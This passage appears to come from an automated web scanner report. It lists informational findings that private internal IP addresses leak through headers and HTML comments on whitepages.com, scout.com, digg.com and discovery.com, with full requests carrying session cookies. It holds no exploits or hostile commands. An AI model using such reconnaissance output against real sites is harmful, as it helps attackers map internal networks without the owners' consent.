Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS4
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=0-0; expires=Sun, 30 Jan 2011 01:30:40 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://redcated/PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


27.8. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:49 GMT
X-DirectServer: whitepg_DS1
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://www.peoplefinders.com/redirect.aspx?


27.9. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=custom_panel/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:48 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com


27.10. http://atl.whitepages.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /accipiter/adclick/CID=fffffffcfffffffcfffffffc/AAMSZ=teaser_link/ATCI=1294100002-3786607/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:48 GMT
X-DirectServer: whitepg_DS2
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com


27.11. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000e376b2c762f700000000/relocate=/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adclick/CID=0000e376b2c762f700000000/relocate=/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:40 GMT
X-DirectServer: whitepg_DS5
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /


27.12. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000ed08b2c762f700000000/relocate=

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:47 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: www.whitepagesinc.com


27.13. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /adclick/CID=0000ed08b2c762f700000000/relocate=/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate=/ HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:43 GMT
X-DirectServer: whitepg_DS0
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /


27.14. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS5
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


27.15. http://college.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://college.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=224&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:57:33 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:57:33 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=224&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 205 ms
-->
...[SNIP]...

27.16. http://collegebasketball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegebasketball.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: collegebasketball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:06:12 GMT
ETag: "1CBC02244730200"
Content-Type: text/html
Content-Length: 43257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=196&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 18:06:12 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 6:06:12 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=196&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 1,803 ms
-->
...[SNIP]...

27.17. http://collegefootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegefootball.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: collegefootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:55 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:55 GMT
Last-Modified: Sun, 30 Jan 2011 02:05:21 GMT
ETag: "1CBC022260D0680"
Content-Type: text/html
Content-Length: 43460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=194&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 18:05:21 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 6:05:21 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=194&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 3,391 ms
-->
...[SNIP]...

27.18. http://content.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z HTTP/1.1
Host: content.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 1/27/2011 4:49:27 PM
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Thursday, January 27, 2011 4:49:27 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 69 ms
-->
...[SNIP]...

27.19. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=32580 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
<span title="10.2.129.226 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

27.20. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search?s=msnbc.redacted HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26240 10.2.129.80
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1



27.21. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
<span title="10.2.128.190 Build: 196 - Wed Jan 26 14:41:03 PST 2011">
...[SNIP]...

27.22. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search?s=msnbc.redacted HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=30639 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1



27.23. http://jcfootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jcfootball.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=87&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:52:25 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:52:25 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=87&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 397 ms
-->
...[SNIP]...

27.24. http://mlb.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mlb.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=243&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:57:57 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:57:57 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=243&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 129 ms
-->
...[SNIP]...

27.25. http://msn.whitepages.com/static/common/endemic.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.whitepages.com
Path:   /static/common/endemic.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/common/endemic.js HTTP/1.1
Host: msn.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:41 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Last-Modified: Tue, 25 Jan 2011 01:51:37 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 15490

// whitepages.survey namespace
if (typeof(whitepages.publicSearch) == 'undefined') { whitepages.publicSearch = function() {}; }
if (typeof(whitepages.publicSearch.mapper) == 'undefined') { whitepage
...[SNIP]...
<ipAddress>192.168.0.1</ipAddress>
...[SNIP]...

27.26. http://news.discovery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62518
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.152
Content-Language: en
Cache-Control: max-age=841
Date: Sun, 30 Jan 2011 18:06:35 GMT
Connection: close

